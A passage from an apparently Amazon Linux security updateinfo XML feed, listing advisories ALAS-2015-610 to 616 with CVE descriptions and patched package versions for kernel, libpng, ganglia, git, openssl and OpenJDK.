arch="i686"><filename>Packages/postgresql93-plperl-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-pltcl" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-pltcl-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-pltcl" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-pltcl-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.5-1.63.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-610</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-610: medium priority package update for kernel</title><issued date="2015-11-23 13:41:00" /><updated date="2015-11-23 21:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7872:
A denial of service vulnerability was discovered in the keyring function&#039;s garbage collector in the Linux kernel. The flaw allowed any local user account to trigger a kernel panic.
1272371:
CVE-2015-7872 kernel: Keyrings crash triggerable by unprivileged user
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7872" title="" id="CVE-2015-7872" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="perf" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.1.13" release="18.26.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.1.13-18.26.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-611</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-611: medium priority package update for libpng</title><issued date="2015-11-23 13:43:00" /><updated date="2015-11-23 22:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8126:
Multiple buffer overflows in the (1) png_set_PLTE and (2) png_get_PLTE functions in libpng before 1.0.64, 1.1.x and 1.2.x before 1.2.54, 1.3.x and 1.4.x before 1.4.17, 1.5.x before 1.5.24, and 1.6.x before 1.6.19 allow remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a small bit-depth value in an IHDR (aka image header) chunk in a PNG image.
1281756:
CVE-2015-8126 libpng: Buffer overflow vulnerabilities in png_get_PLTE/png_set_PLTE functions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8126" title="" id="CVE-2015-8126" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libpng-devel" version="1.2.49" release="1.13.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-devel-1.2.49-1.13.amzn1.x86_64.rpm</filename></package><package name="libpng-static" version="1.2.49" release="1.13.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-static-1.2.49-1.13.amzn1.x86_64.rpm</filename></package><package name="libpng" version="1.2.49" release="1.13.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-1.2.49-1.13.amzn1.x86_64.rpm</filename></package><package name="libpng-debuginfo" version="1.2.49" release="1.13.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-debuginfo-1.2.49-1.13.amzn1.x86_64.rpm</filename></package><package name="libpng-static" version="1.2.49" release="1.13.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-static-1.2.49-1.13.amzn1.i686.rpm</filename></package><package name="libpng-debuginfo" version="1.2.49" release="1.13.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-debuginfo-1.2.49-1.13.amzn1.i686.rpm</filename></package><package name="libpng-devel" version="1.2.49" release="1.13.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-devel-1.2.49-1.13.amzn1.i686.rpm</filename></package><package name="libpng" version="1.2.49" release="1.13.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-1.2.49-1.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-612</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-612: important priority package update for ganglia</title><issued date="2015-11-23 13:44:00" /><updated date="2015-11-23 22:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6816:
1260562:
CVE-2015-6816 ganglia: Bypassing Ganglia-web auth using boolean serialization
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6816" title="" id="CVE-2015-6816" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ganglia-web" version="3.7.1" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-web-3.7.1-2.19.amzn1.x86_64.rpm</filename></package><package name="ganglia-devel" version="3.7.2" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-devel-3.7.2-2.19.amzn1.x86_64.rpm</filename></package><package name="ganglia-gmond-python" version="3.7.2" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-gmond-python-3.7.2-2.19.amzn1.x86_64.rpm</filename></package><package name="ganglia" version="3.7.2" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-3.7.2-2.19.amzn1.x86_64.rpm</filename></package><package name="ganglia-debuginfo" version="3.7.2" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-debuginfo-3.7.2-2.19.amzn1.x86_64.rpm</filename></package><package name="ganglia-gmetad" version="3.7.2" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-gmetad-3.7.2-2.19.amzn1.x86_64.rpm</filename></package><package name="ganglia-gmond" version="3.7.2" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-gmond-3.7.2-2.19.amzn1.x86_64.rpm</filename></package><package name="ganglia-gmetad" version="3.7.2" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-gmetad-3.7.2-2.19.amzn1.i686.rpm</filename></package><package name="ganglia-gmond" version="3.7.2" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-gmond-3.7.2-2.19.amzn1.i686.rpm</filename></package><package name="ganglia-devel" version="3.7.2" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-devel-3.7.2-2.19.amzn1.i686.rpm</filename></package><package name="ganglia-gmond-python" version="3.7.2" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-gmond-python-3.7.2-2.19.amzn1.i686.rpm</filename></package><package name="ganglia-web" version="3.7.1" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-web-3.7.1-2.19.amzn1.i686.rpm</filename></package><package name="ganglia" version="3.7.2" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-3.7.2-2.19.amzn1.i686.rpm</filename></package><package name="ganglia-debuginfo" version="3.7.2" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-debuginfo-3.7.2-2.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-613</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-613: medium priority package update for git</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7545:
A flaw was found in the way the git-remote-ext helper processed certain URLs. If a user had Git configured to automatically clone submodules from untrusted repositories, an attacker could inject commands into the URL of a submodule, allowing them to execute arbitrary code on the user&#039;s system.
1269794:
CVE-2015-7545 git: arbitrary code execution via crafted URLs
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7545" title="" id="CVE-2015-7545" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-email" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.4.3" release="7.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.4.3-7.42.amzn1.x86_64.rpm</filename></package><package name="emacs-git" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.4.3" release="7.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.4.3-7.42.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git" version="2.4.3" release="7.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.4.3-7.42.amzn1.x86_64.rpm</filename></package><package name="perl-Git" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.4.3" release="7.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.4.3-7.42.amzn1.x86_64.rpm</filename></package><package name="perl-Git-SVN" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.4.3" release="7.42.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.4.3-7.42.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.4.3" release="7.42.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.4.3-7.42.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.4.3" release="7.42.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.4.3-7.42.amzn1.i686.rpm</filename></package><package name="git" version="2.4.3" release="7.42.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.4.3-7.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-614</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-614: medium priority package update for openssl</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3196:
A race condition flaw, leading to a double free, was found in the way OpenSSL handled pre-shared keys (PSKs). A remote attacker could use this flaw to crash a multi-threaded SSL/TLS client.
1288326:
CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint
CVE-2015-3195:
A memory leak vulnerability was found in the way OpenSSL parsed certain PKCS#7 or CMS data. A remote attacker could use this flaw to cause an application that parses PKCS#7 or CMS data from untrusted sources to crash due to memory exhaustion.
1288322:
CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak
CVE-2015-3194:
A denial of service flaw was found in the way OpenSSL verified certain signatures using the RSA PSS algorithm. If client authentication was enabled, a remote attacker could craft a X.509 client-side certificate which, when processed, could possibly crash a TLS/SSL server or client using OpenSSL.
1288320:
CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3194" title="" id="CVE-2015-3194" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3195" title="" id="CVE-2015-3195" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3196" title="" id="CVE-2015-3196" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-debuginfo" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-13.88.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-13.88.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-13.88.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-13.88.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-13.88.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-13.88.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-13.88.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-13.88.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-13.88.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-13.88.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-615</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-615: medium priority package update for libpng</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8472:
An array-indexing error was discovered in the png_convert_to_rfc1123() function of libpng. An attacker could possibly use this flaw to cause an out-of-bounds read by tricking an unsuspecting user into processing a specially crafted PNG image.
1281756:
CVE-2015-8126 CVE-2015-8472 libpng: Buffer overflow vulnerabilities in png_get_PLTE/png_set_PLTE functions
CVE-2015-7981:
It was discovered that the png_get_PLTE() and png_set_PLTE() functions of libpng did not correctly calculate the maximum palette sizes for bit depths of less than 8. In case an application tried to use these functions in combination with properly calculated palette sizes, this could lead to a buffer overflow or out-of-bounds reads. An attacker could exploit this to cause a crash or potentially execute arbitrary code by tricking an unsuspecting user into processing a specially crafted PNG image. However, the exact impact is dependent on the application using the library.
1276416:
CVE-2015-7981 libpng: Out-of-bounds read in png_convert_to_rfc1123
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7981" title="" id="CVE-2015-7981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8472" title="" id="CVE-2015-8472" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libpng-debuginfo" version="1.2.49" release="2.14.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-debuginfo-1.2.49-2.14.amzn1.x86_64.rpm</filename></package><package name="libpng-devel" version="1.2.49" release="2.14.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-devel-1.2.49-2.14.amzn1.x86_64.rpm</filename></package><package name="libpng-static" version="1.2.49" release="2.14.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-static-1.2.49-2.14.amzn1.x86_64.rpm</filename></package><package name="libpng" version="1.2.49" release="2.14.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-1.2.49-2.14.amzn1.x86_64.rpm</filename></package><package name="libpng-devel" version="1.2.49" release="2.14.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-devel-1.2.49-2.14.amzn1.i686.rpm</filename></package><package name="libpng-debuginfo" version="1.2.49" release="2.14.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-debuginfo-1.2.49-2.14.amzn1.i686.rpm</filename></package><package name="libpng-static" version="1.2.49" release="2.14.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-static-1.2.49-2.14.amzn1.i686.rpm</filename></package><package name="libpng" version="1.2.49" release="2.14.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-1.2.49-2.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-616</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-616: important priority package update for java-1.6.0-openjdk</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4911:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4903:
Multiple flaws were found in the Libraries, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4893:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4883:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4882:
Multiple flaws were found in the Libraries, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4881:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4872:
It was discovered that the Security component in OpenJDK failed to properly check if a certificate satisfied all defined constraints. In certain cases, this could cause a Java application to accept an X.509 certificate which does not meet requirements of the defined policy.
CVE-2015-4860:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4844:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4843:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4842:
Multiple flaws were found in the Libraries, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4835:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4806:
Multiple flaws were found in the Libraries, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4805:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4803:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4734:
Multiple flaws were found in the Libraries, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4734" title="" id="CVE-2015-4734" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4803" title="" id="CVE-2015-4803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4805" title="" id="CVE-2015-4805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4806" title="" id="CVE-2015-4806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4835" title="" id="CVE-2015-4835" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4842" title="" id="CVE-2015-4842" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4843" title="" id="CVE-2015-4843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4844" title="" id="CVE-2015-4844" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4860" title="" id="CVE-2015-4860" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4872" title="" id="CVE-2015-4872" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4881" title="" id="CVE-2015-4881" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4882" title="" id="CVE-2015-4882" type="cve" /><reference 